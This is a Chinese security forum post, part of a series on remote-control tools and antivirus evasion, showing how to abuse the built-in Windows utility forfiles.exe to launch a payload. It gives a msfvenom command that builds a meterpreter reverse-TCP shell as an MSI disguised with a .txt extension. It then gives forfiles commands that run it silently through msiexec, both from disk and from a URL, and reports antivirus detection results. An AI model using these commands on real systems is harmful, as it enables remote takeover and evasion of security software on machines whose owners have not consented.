安全矩阵

 找回密码
 立即注册
搜索
查看: 2747|回复: 0

远控免杀专题(60)-白名单Forfiles.exe执行payload

[复制链接]

22

主题

63

帖子

336

积分

中级会员

Rank: 3Rank: 3

积分
336
发表于 2020-3-29 19:37:36 | 显示全部楼层 |阅读模式
一、Forfiles.exe介绍
Forfiles是一款windows平台默认安装的文件操作搜索工具之一,可以通过文件名称,修改日期等条件选择文件并运行一个命令来操作文件。它可以直接在命令行中使用,也可以在批处理文件或其他脚本中使用。
默认安装位置:

C:\WINDOWS\system32\forfiles.exeC:\WINDOWS\SysWOW64\forfiles.exe
说明:Forfiles.exe所在路径已被系统添加PATH环境变量中,因此,Forfiles命令可识别,需注意x86,x64位的Forfiles调用。
二、利用Forfiles.exe执行payload
使用msfvenom生成msi文件,指定后缀为txt。

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.16.100.207 LPORT=4444 -f msi > TIDE.txt
移动到靶机上执行命令运行

forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\Users\administrator\Desktop\TIDE.txt"
成功上线。
还可以通过远程访问的形式执行,同样可以成功上线。

forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe / q /i http://127.0.0.1/TIDE.txt"
打开杀软进行测试。360杀毒,360安全卫士,和火绒都报毒。
vt查杀率34/60
三、参考资料
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/84_基于白名单Forfiles执行payload第十四季.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-2 07:10 , Processed in 0.012196 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表